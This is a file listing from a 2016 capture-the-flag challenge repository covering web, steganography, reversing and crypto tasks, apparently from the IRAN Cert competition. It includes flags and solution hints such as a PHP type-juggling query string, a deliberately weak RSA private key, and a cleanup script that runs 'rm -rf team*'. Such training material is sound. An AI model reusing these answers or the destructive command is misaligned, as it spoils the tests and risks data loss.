Cert/2016/1- Easy/PPC & Web/project/db.sqlite3 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | 5 | if __name__ == "__main__": 6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings") 7 | 8 | from django.core.management import execute_from_command_line 9 | 10 | execute_from_command_line(sys.argv) 11 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/settings.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/settings.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/urls.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/urls.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/wsgi.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/project/wsgi.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- decompile me/Sources/DecompileIt.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- decompile me/Sources/DecompileIt.jar -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- decompile me/docompile me/DecompileIt.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- decompile me/docompile me/DecompileIt.jar -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- useless/info.txt: -------------------------------------------------------------------------------- 1 | APACTF{345Y_with_Debugging_right?} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- useless/useless/binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Reverse/30pt- useless/useless/binary -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Steg/40pt- funny messaging/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APACTF{If_u_think_ab0ut_it_it_w4s_4_little_funny} 3 | 4 | 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/pass.txt: -------------------------------------------------------------------------------- 1 | remember, I put the 4-digit word that we always use when we share stuff, for the password. 2 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/sample.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/sample.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/sample.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/sample.wav -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/Resources/secret.txt: -------------------------------------------------------------------------------- 1 | APACTF{Always_f!rst_ch3ck_Steghide_for_this_kind_of_t45ks} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/hidden secret/file: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Steg/50pt- hidden secret/hidden secret/file -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/flag.txt: -------------------------------------------------------------------------------- 1 | APACTF{DJANGO_DEBUG_!S_D4NGEROUS} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/dataSources.local.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/scopes/scope_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/admin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/admin.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/models.py: -------------------------------------------------------------------------------- 1 | from django.db import models 2 | 3 | 4 | class flag(models.Model): 5 | name = models.CharField(max_length=100) 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/app/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/db.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/db.sqlite3 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | 5 | if __name__ == "__main__": 6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings") 7 | 8 | from django.core.management import execute_from_command_line 9 | 10 | execute_from_command_line(sys.argv) 11 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/settings.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/settings.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/urls.py: -------------------------------------------------------------------------------- 1 | from django.conf.urls import include, url, patterns 2 | from django.contrib import admin 3 | 4 | urlpatterns = patterns('', 5 | #url(r'^admin/', include(admin.site.urls)), 6 | url(r'^$', 'app.views.index'), 7 | url(r'^index$', 'app.views.index'), 8 | ) 9 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/urls.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/urls.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/wsgi.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/20pt- do you know how to debug/project/project/wsgi.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/40pt- make it collide/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APA{First_l00k_for_7h3_bug5} 3 | 4 | Soloution: 5 | ?pass1[]=testing&pass2[]=testing 6 | 7 | Points: 8 | 25pt -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/40pt- modern website/Sources/Untitled-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Web/40pt- modern website/Sources/Untitled-1.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/1- Easy/Web/40pt- modern website/Sources/db-creds.inc: -------------------------------------------------------------------------------- 1 | 10 | 11 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/Solution/out.pub: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKY1BuFcaOPuJH2iXISpD2b56bZm0Z+l 3 | LmZho3BRb3rrAgMBAAE= 4 | -----END PUBLIC KEY----- 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/create.md: -------------------------------------------------------------------------------- 1 | openssl genrsa -out out.key 256 2 | openssl rsa -in out.key -pubout > out.pub 3 | echo "APACTF{T0o0_w3e3e3k}" | openssl rsautl -encrypt -pubin -inkey out.pub > msg.enc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/out.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIGpAgEAAiEApjUG4Vxo4+4kfaJchKkPZvnptmbRn6UuZmGjcFFveusCAwEAAQIg 3 | Lv21CUhYO4Eb/g1GfRdTTARZVWXtOk/5TdlWukpLkCkCEQDSMIwZet1PmmYjIbEq 4 | yX4nAhEAym5+BkmWyGxriCASSFkbnQIQMVRtfQll6WnOMM6WevlBHwIQeANFx+h8 5 | 8loE7nFFJYteqQIQVaadc1yxQ2artd1hrS2u8g== 6 | -----END RSA PRIVATE KEY----- 7 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/rsa2/msg.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/rsa2/msg.enc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Crypto/70pt- rsa2/rsa2/out.pub: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKY1BuFcaOPuJH2iXISpD2b56bZm0Z+l 3 | LmZho3BRb3rrAgMBAAE= 4 | -----END PUBLIC KEY----- 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/!pd.nfo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/!pd.nfo -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/!pd.nfo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/!pd.nfo -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/pd.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/pd.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/Click.598-1395.10.19_p30download.com/www.p30download.com.url: -------------------------------------------------------------------------------- 1 | [DEFAULT] 2 | BASEURL=http://www.p30download.com/ 3 | [InternetShortcut] 4 | URL=http://www.p30download.com/ 5 | Modified=A07A87911284C5018E 6 | IDList= 7 | IconFile=http://p30download.com/favicon.ico 8 | IconIndex=1 9 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/flag.txt: -------------------------------------------------------------------------------- 1 | Nice job. Flag is APACTF{Y0U_successfully_Cr4ck3d_ME} 2 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/pd.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/pd.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/Sources/www.p30download.com.url: -------------------------------------------------------------------------------- 1 | [DEFAULT] 2 | BASEURL=http://www.p30download.com/ 3 | [InternetShortcut] 4 | URL=http://www.p30download.com/ 5 | Modified=A07A87911284C5018E 6 | IDList= 7 | IconFile=http://p30download.com/favicon.ico 8 | IconIndex=1 9 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/catch me if you can/flag.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- catch me if you can/catch me if you can/flag.zip -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- crypted png/crypted png/flag_encrypted.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Misc/80pt- crypted png/crypted png/flag_encrypted.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/can you crack this/crackme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/can you crack this/crackme -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/crackme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/crackme -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Reverse/50pt- can you crack this/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APACTF{jnhFClg2sv3uaBBxs} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/Resources/clear.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from os import popen 3 | from os import mkdir 4 | from sys import argv 5 | N = int(argv[1]) 6 | 7 | popen('rm -rf team*') 8 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/Resources/rev: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/Resources/rev -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APACTF{Ok4y_Chi3f_Ug0t_me_again} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/password validator/rev: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/password validator/rev -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/rev: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Reverse/60pt- password validator/rev -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/flag.txt: -------------------------------------------------------------------------------- 1 | Nice job, Flag is APACTF{L00king_Good_w!th_outguess} -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/info.txt: -------------------------------------------------------------------------------- 1 | Flag: 2 | APACTF{L00king_Good_w!th_outguess} 3 | 4 | 5 | Description: 6 | Try this one, I hide another flag. I'm pretty sure you can't find this one that easily. 7 | 8 | 9 | Solution: 10 | outguess -r hidden.jpg out.txt -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/sample.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/sample.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/tricky but easy/hidden.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/2- Medium/Steg/50pt- tricky but easy/tricky but easy/hidden.jpg -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Web/50pt- i like serials/Sources/flag.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Web/50pt- i like serials/info.txt: -------------------------------------------------------------------------------- 1 | Description: 2 | Simple php website, go and visit it. 3 | 4 | Flag: 5 | APACTF{!7_couldnt_b3_Easi3r_than_7h!5} 6 | 7 | Solution: 8 | create and serialize a profile with username = 'admin' value 9 | use solve.php -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/2- Medium/Web/70pt- old php/flag.php: -------------------------------------------------------------------------------- 1 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/css/font-awesome/fonts/FontAwesome.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/css/font-awesome/fonts/FontAwesome.otf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/favicon.png -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-black-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-blackitalic-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.ttf -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.woff -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bold-webfont.woff2 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.eot -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Network/do the impossible/Q11_Web_application/Q11_Web_application/html/fonts/roboto/roboto-bolditalic-webfont.ttf 